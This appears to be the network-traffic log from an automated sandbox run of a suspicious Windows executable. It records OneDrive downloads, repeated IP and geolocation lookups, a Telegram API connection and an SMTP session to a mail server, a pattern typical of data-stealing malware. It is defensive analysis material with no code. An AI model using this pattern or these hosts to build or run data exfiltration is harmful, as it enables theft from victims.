                                                                                                                                                Nov 12, 2024 07:36:54.512190104 CET49723443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:54.512447119 CET49723443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:54.512454987 CET44349723188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:54.561873913 CET4972280192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:55.115391970 CET44349723188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:55.117129087 CET49723443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:55.117147923 CET44349723188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:55.255525112 CET44349723188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:55.255582094 CET44349723188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:55.255637884 CET49723443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:55.256084919 CET49723443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:55.259562016 CET4972280192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:55.260620117 CET4972480192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:55.264617920 CET8049722193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:55.264691114 CET4972280192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:55.265510082 CET8049724193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:55.265571117 CET4972480192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:55.265676975 CET4972480192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:55.270432949 CET8049724193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:56.994812012 CET8049724193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:56.996154070 CET49725443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:56.996191025 CET44349725188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:56.996279001 CET49725443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:56.996551991 CET49725443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:56.996562958 CET44349725188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:57.046325922 CET4972480192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:57.612670898 CET44349725188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:57.614273071 CET49725443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:57.614295959 CET44349725188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:57.756067991 CET44349725188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:57.756124020 CET44349725188.114.96.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:57.756176949 CET49725443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:57.756611109 CET49725443192.168.2.8188.114.96.3
                                                                                                                                                Nov 12, 2024 07:36:57.764748096 CET4972680192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:57.764807940 CET4972480192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:57.769526958 CET8049726193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:57.769620895 CET4972680192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:57.769855022 CET8049724193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:57.769925117 CET4972480192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:57.775499105 CET4972680192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:36:57.780468941 CET8049726193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:00.246047974 CET8049726193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:00.254535913 CET49727443192.168.2.8188.114.97.3
                                                                                                                                                Nov 12, 2024 07:37:00.254576921 CET44349727188.114.97.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:00.254645109 CET49727443192.168.2.8188.114.97.3
                                                                                                                                                Nov 12, 2024 07:37:00.255064011 CET49727443192.168.2.8188.114.97.3
                                                                                                                                                Nov 12, 2024 07:37:00.255078077 CET44349727188.114.97.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:00.296282053 CET4972680192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:37:00.858588934 CET44349727188.114.97.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:00.860300064 CET49727443192.168.2.8188.114.97.3
                                                                                                                                                Nov 12, 2024 07:37:00.860327959 CET44349727188.114.97.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:01.003581047 CET44349727188.114.97.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:01.003653049 CET44349727188.114.97.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:01.003726959 CET49727443192.168.2.8188.114.97.3
                                                                                                                                                Nov 12, 2024 07:37:01.004162073 CET49727443192.168.2.8188.114.97.3
                                                                                                                                                Nov 12, 2024 07:37:01.007788897 CET4972680192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:37:01.009002924 CET4972880192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:37:01.012801886 CET8049726193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:01.012877941 CET4972680192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:37:01.013813019 CET8049728193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:01.013878107 CET4972880192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:37:01.014020920 CET4972880192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:37:01.018755913 CET8049728193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:02.744673014 CET8049728193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:02.746474981 CET49729443192.168.2.8188.114.97.3
                                                                                                                                                Nov 12, 2024 07:37:02.746507883 CET44349729188.114.97.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:02.746613979 CET49729443192.168.2.8188.114.97.3
                                                                                                                                                Nov 12, 2024 07:37:02.746942997 CET49729443192.168.2.8188.114.97.3
                                                                                                                                                Nov 12, 2024 07:37:02.746961117 CET44349729188.114.97.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:02.796297073 CET4972880192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:37:03.346960068 CET44349729188.114.97.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:03.348629951 CET49729443192.168.2.8188.114.97.3
                                                                                                                                                Nov 12, 2024 07:37:03.348649979 CET44349729188.114.97.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:03.489451885 CET44349729188.114.97.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:03.489527941 CET44349729188.114.97.3192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:03.489578009 CET49729443192.168.2.8188.114.97.3
                                                                                                                                                Nov 12, 2024 07:37:03.489996910 CET49729443192.168.2.8188.114.97.3
                                                                                                                                                Nov 12, 2024 07:37:03.508493900 CET4972880192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:37:03.513523102 CET8049728193.122.130.0192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:03.513575077 CET4972880192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:37:03.519639969 CET49730443192.168.2.8149.154.167.220
                                                                                                                                                Nov 12, 2024 07:37:03.519681931 CET44349730149.154.167.220192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:03.519764900 CET49730443192.168.2.8149.154.167.220
                                                                                                                                                Nov 12, 2024 07:37:03.520170927 CET49730443192.168.2.8149.154.167.220
                                                                                                                                                Nov 12, 2024 07:37:03.520184994 CET44349730149.154.167.220192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:04.366983891 CET44349730149.154.167.220192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:04.367146015 CET49730443192.168.2.8149.154.167.220
                                                                                                                                                Nov 12, 2024 07:37:04.369152069 CET49730443192.168.2.8149.154.167.220
                                                                                                                                                Nov 12, 2024 07:37:04.369178057 CET44349730149.154.167.220192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:04.369440079 CET44349730149.154.167.220192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:04.370928049 CET49730443192.168.2.8149.154.167.220
                                                                                                                                                Nov 12, 2024 07:37:04.415342093 CET44349730149.154.167.220192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:04.603197098 CET44349730149.154.167.220192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:04.603272915 CET44349730149.154.167.220192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:04.603337049 CET49730443192.168.2.8149.154.167.220
                                                                                                                                                Nov 12, 2024 07:37:04.603852034 CET49730443192.168.2.8149.154.167.220
                                                                                                                                                Nov 12, 2024 07:37:10.236033916 CET4971880192.168.2.8193.122.130.0
                                                                                                                                                Nov 12, 2024 07:37:10.559000015 CET49731587192.168.2.837.27.123.72
                                                                                                                                                Nov 12, 2024 07:37:10.563882113 CET5874973137.27.123.72192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:10.564011097 CET49731587192.168.2.837.27.123.72
                                                                                                                                                Nov 12, 2024 07:37:11.544866085 CET5874973137.27.123.72192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:11.545109987 CET49731587192.168.2.837.27.123.72
                                                                                                                                                Nov 12, 2024 07:37:11.549978971 CET5874973137.27.123.72192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:11.808736086 CET5874973137.27.123.72192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:11.809822083 CET49731587192.168.2.837.27.123.72
                                                                                                                                                Nov 12, 2024 07:37:11.814698935 CET5874973137.27.123.72192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:12.073113918 CET5874973137.27.123.72192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:12.073576927 CET49731587192.168.2.837.27.123.72
                                                                                                                                                Nov 12, 2024 07:37:12.078522921 CET5874973137.27.123.72192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:12.386077881 CET5874973137.27.123.72192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:12.386405945 CET49731587192.168.2.837.27.123.72
                                                                                                                                                Nov 12, 2024 07:37:12.392594099 CET5874973137.27.123.72192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:12.651034117 CET5874973137.27.123.72192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:12.651307106 CET49731587192.168.2.837.27.123.72
                                                                                                                                                Nov 12, 2024 07:37:12.656174898 CET5874973137.27.123.72192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:12.938110113 CET5874973137.27.123.72192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:12.938277006 CET49731587192.168.2.837.27.123.72
                                                                                                                                                Nov 12, 2024 07:37:12.943171024 CET5874973137.27.123.72192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:13.201390982 CET5874973137.27.123.72192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:13.202212095 CET49731587192.168.2.837.27.123.72
                                                                                                                                                Nov 12, 2024 07:37:13.202358007 CET49731587192.168.2.837.27.123.72
                                                                                                                                                Nov 12, 2024 07:37:13.202430010 CET49731587192.168.2.837.27.123.72
                                                                                                                                                Nov 12, 2024 07:37:13.202430010 CET49731587192.168.2.837.27.123.72
                                                                                                                                                Nov 12, 2024 07:37:13.207062006 CET5874973137.27.123.72192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:13.207108021 CET5874973137.27.123.72192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:13.207223892 CET5874973137.27.123.72192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:13.207384109 CET5874973137.27.123.72192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:13.207395077 CET5874973137.27.123.72192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:13.806675911 CET5874973137.27.123.72192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:13.858788967 CET49731587192.168.2.837.27.123.72
                                                                                                                                                Nov 12, 2024 07:38:50.484103918 CET49731587192.168.2.837.27.123.72
                                                                                                                                                Nov 12, 2024 07:38:50.488924026 CET5874973137.27.123.72192.168.2.8
                                                                                                                                                Nov 12, 2024 07:38:50.947993040 CET5874973137.27.123.72192.168.2.8
                                                                                                                                                Nov 12, 2024 07:38:50.948240042 CET49731587192.168.2.837.27.123.72
                                                                                                                                                Nov 12, 2024 07:38:50.953289986 CET5874973137.27.123.72192.168.2.8
                                                                                                                                                Nov 12, 2024 07:38:50.953533888 CET49731587192.168.2.837.27.123.72
                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Nov 12, 2024 07:36:39.546437025 CET6328453192.168.2.81.1.1.1
                                                                                                                                                Nov 12, 2024 07:36:40.738440990 CET5149453192.168.2.81.1.1.1
                                                                                                                                                Nov 12, 2024 07:36:44.697698116 CET5369453192.168.2.81.1.1.1
                                                                                                                                                Nov 12, 2024 07:36:44.704377890 CET53536941.1.1.1192.168.2.8
                                                                                                                                                Nov 12, 2024 07:36:48.542031050 CET5086753192.168.2.81.1.1.1
                                                                                                                                                Nov 12, 2024 07:36:48.549071074 CET53508671.1.1.1192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:00.247168064 CET6542953192.168.2.81.1.1.1
                                                                                                                                                Nov 12, 2024 07:37:00.253770113 CET53654291.1.1.1192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:03.509319067 CET5837953192.168.2.81.1.1.1
                                                                                                                                                Nov 12, 2024 07:37:03.518946886 CET53583791.1.1.1192.168.2.8
                                                                                                                                                Nov 12, 2024 07:37:10.467545033 CET6290753192.168.2.81.1.1.1
                                                                                                                                                Nov 12, 2024 07:37:10.557713032 CET53629071.1.1.1192.168.2.8
                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                Nov 12, 2024 07:36:39.546437025 CET192.168.2.81.1.1.10x47fdStandard query (0)api.onedrive.comA (IP address)IN (0x0001)false
                                                                                                                                                Nov 12, 2024 07:36:40.738440990 CET192.168.2.81.1.1.10x2133Standard query (0)fa2ytg.dm.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                Nov 12, 2024 07:36:44.697698116 CET192.168.2.81.1.1.10x976bStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                Nov 12, 2024 07:36:48.542031050 CET192.168.2.81.1.1.10xb076Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                Nov 12, 2024 07:37:00.247168064 CET192.168.2.81.1.1.10xb7e9Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                Nov 12, 2024 07:37:03.509319067 CET192.168.2.81.1.1.10x42a1Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                Nov 12, 2024 07:37:10.467545033 CET192.168.2.81.1.1.10xe450Standard query (0)mail.foodex.com.pkA (IP address)IN (0x0001)false
                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                Nov 12, 2024 07:36:39.553090096 CET1.1.1.1192.168.2.80x47fdNo error (0)api.onedrive.comcommon-afdrk.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                Nov 12, 2024 07:36:39.553090096 CET1.1.1.1192.168.2.80x47fdNo error (0)common-afdrk.fe.1drv.comodc-commonafdrk-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                Nov 12, 2024 07:36:40.788109064 CET1.1.1.1192.168.2.80x2133No error (0)fa2ytg.dm.files.1drv.comdm-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                Nov 12, 2024 07:36:40.788109064 CET1.1.1.1192.168.2.80x2133No error (0)dm-files.fe.1drv.comodc-dm-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                Nov 12, 2024 07:36:44.704377890 CET1.1.1.1192.168.2.80x976bNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                Nov 12, 2024 07:36:44.704377890 CET1.1.1.1192.168.2.80x976bNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                Nov 12, 2024 07:36:44.704377890 CET1.1.1.1192.168.2.80x976bNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                Nov 12, 2024 07:36:44.704377890 CET1.1.1.1192.168.2.80x976bNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                Nov 12, 2024 07:36:44.704377890 CET1.1.1.1192.168.2.80x976bNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                Nov 12, 2024 07:36:44.704377890 CET1.1.1.1192.168.2.80x976bNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                Nov 12, 2024 07:36:48.549071074 CET1.1.1.1192.168.2.80xb076No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                Nov 12, 2024 07:36:48.549071074 CET1.1.1.1192.168.2.80xb076No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                Nov 12, 2024 07:37:00.253770113 CET1.1.1.1192.168.2.80xb7e9No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                Nov 12, 2024 07:37:00.253770113 CET1.1.1.1192.168.2.80xb7e9No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                Nov 12, 2024 07:37:03.518946886 CET1.1.1.1192.168.2.80x42a1No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                Nov 12, 2024 07:37:10.557713032 CET1.1.1.1192.168.2.80xe450No error (0)mail.foodex.com.pkfoodex.com.pkCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                Nov 12, 2024 07:37:10.557713032 CET1.1.1.1192.168.2.80xe450No error (0)foodex.com.pk37.27.123.72A (IP address)IN (0x0001)false
                                                                                                                                                • reallyfreegeoip.org
                                                                                                                                                • api.telegram.org
                                                                                                                                                • checkip.dyndns.org
                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                0192.168.2.849715193.122.130.0805916C:\Users\user\Desktop\________.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 12, 2024 07:36:44.722284079 CET151OUTGET / HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Nov 12, 2024 07:36:45.402075052 CET323INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 12 Nov 2024 06:36:45 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 106
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Request-ID: 97414ebf9edf69bcc3980194983cee36
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.68</body></html>
                                                                                                                                                Nov 12, 2024 07:36:45.417691946 CET127OUTGET / HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                                Nov 12, 2024 07:36:47.658318043 CET730INHTTP/1.1 502 Bad Gateway
                                                                                                                                                Date: Tue, 12 Nov 2024 06:36:47 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 547
                                                                                                                                                Connection: keep-alive
                                                                                                                                                X-Request-ID: 15255f87403a740c92d2139f634fa564
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED]
                                                                                                                                                Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                Nov 12, 2024 07:36:47.682495117 CET127OUTGET / HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                                Nov 12, 2024 07:36:48.225405931 CET323INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 12 Nov 2024 06:36:48 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 106
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Request-ID: e1ad9b294442f0d17e6bb703a52e2c87
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.68</body></html>
                                                                                                                                                Nov 12, 2024 07:36:49.381944895 CET127OUTGET / HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                                Nov 12, 2024 07:36:49.542319059 CET323INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 12 Nov 2024 06:36:49 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 106
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Request-ID: 8ac156380a8e64f0ddce47e0cd5098f8
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.68</body></html>
                                                                                                                                                Nov 12, 2024 07:36:49.772830009 CET323INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 12 Nov 2024 06:36:49 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 106
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Request-ID: 8ac156380a8e64f0ddce47e0cd5098f8
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.68</body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                1192.168.2.849718193.122.130.0805916C:\Users\user\Desktop\________.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 12, 2024 07:36:50.322083950 CET127OUTGET / HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                                Nov 12, 2024 07:36:51.645483017 CET323INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 12 Nov 2024 06:36:51 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 106
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Request-ID: 04264fd8a3a4948c8371a9db31b0a83b
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.68</body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                2192.168.2.849720193.122.130.0805916C:\Users\user\Desktop\________.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 12, 2024 07:36:52.402673006 CET151OUTGET / HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                Host: checkip.dyndns.org
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Nov 12, 2024 07:36:53.094225883 CET323INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 12 Nov 2024 06:36:53 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 106
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Request-ID: 7a7c8b35689292caa9d71d0274172e1c
